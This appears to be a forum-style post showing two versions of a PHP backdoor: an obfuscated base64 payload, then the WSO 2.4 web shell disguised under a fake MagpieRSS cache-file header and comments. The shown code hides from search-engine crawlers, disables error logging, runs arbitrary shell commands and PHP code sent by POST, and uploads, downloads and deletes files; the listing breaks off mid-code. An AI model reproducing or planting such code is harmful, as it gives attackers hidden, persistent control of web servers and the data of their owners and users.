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'\x29\x29\x29\x3B",".");?>

And here is the second version:

<?php /* * Project: MagpieRSS: a simple RSS integration tool * File: rss_cache.inc, a simple, rolling(no GC), cache * for RSS objects, keyed on URL. * Author: Kellan Elliott-McCrea <kellan@protest.net> * Version: 0.51 * License: GPL * * The lastest version of MagpieRSS can be obtained from: * http://magpierss.sourceforge.net * * For questions, help, comments, discussion, etc., please join the * Magpie mailing list: * http://lists.sourceforge.net/lists/listinfo/magpierss-general * */ $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; /*=======================================================================*\ Function: file_name Purpose: map url to location in cache Input: url from wich the rss file was fetched Output: a file name \*=======================================================================*/ if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @session_start(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.4'); /*=======================================================================*\ Function: check_cache Purpose: check a url for membership in the cache and whether the object is older then MAX_AGE (ie. STALE) Input: url from wich the rss file was fetched Output: cached object on HIT, false on MISS \*=======================================================================*/ if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); } function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else wsoLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ." cheebeez edition</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: $color !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:250px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Files'=>'FilesMan','Console'=>'Console','Php'=>'Php'); $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>User:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' . '<td>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '<br></td>' . '<td width=1 align=right></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0><tr>' . $menu . '</tr></table><div style="margin:5">'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'õ' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'õ' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'õ' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionPhp() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; echo strlen($temp), "\n", $temp; exit; } wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('<h1','<h2', $tmp) .'</div><br>'; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; wsoFooter(); } function actionFilesMan() { wsoHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); } elseif($_SESSION['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_SESSION['c']); foreach($_SESSION['f'] as $f) { if($f == '..') continue; if(@is_file($_SESSION['c'].$f)) $zip->addFile($_SESSION['c'].$f, $f); elseif(@is_dir($_SESSION['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_SESSION['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_SESSION['f'] as $f) { if($zip->open($_SESSION['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_SESSION['act'] == 'tar') { chdir($_SESSION['c']); $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f'])); chdir($GLOBALS['cwd']); } unset($_SESSION['f']); break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; echo "<option value='tar'>Compress (tar.gz)</option>"; if(!empty($_SESSION['act']) && @count($_SESSION['f'])) echo "<option value='paste'>Paste / Compress</option>"; echo "</select>&nbsp;"; if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;"; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 